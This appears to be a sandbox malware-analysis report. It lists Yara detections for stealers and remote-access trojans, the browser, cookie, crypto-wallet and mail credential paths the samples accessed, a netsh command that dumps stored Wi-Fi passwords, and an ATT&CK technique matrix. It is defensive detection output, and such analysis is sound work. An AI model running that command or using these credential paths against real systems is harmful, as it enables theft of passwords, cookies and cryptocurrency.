Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected WorldWind Stealer

Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: JaxxDir
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: ExodusDir
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q%appdata%`,^qdC:\Users\user\AppData\Roaming`,^qdC:\Users\user\AppData\Roaming\Binance
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2A
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\System32\relog.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.2.svchost.exe.6d60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3950838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3950838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6d60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RL STEALER

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 20.0.62AB.tmp.build.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

Yara detected WorldWind Stealer

Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	14 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Disable or Modify Tools	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	14 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Create Account	1112 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Data from Local System	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	3 Scheduled Task/Job	3 Scheduled Task/Job	241 Obfuscated Files or Information	NTDS	158 System Information Discovery	Distributed Component Object Model	11 Screen Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	12 Software Packing	LSA Secrets	5101 Security Software Discovery	SSH	1 Email Collection	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	271 Virtualization/Sandbox Evasion	VNC	1 Credential API Hooking	125 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	1 Input Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rootkit	Proc Filesystem	1 Application Window Discovery	Cloud Services	3 Clipboard Data	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	221 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	271 Virtualization/Sandbox Evasion	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1112 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
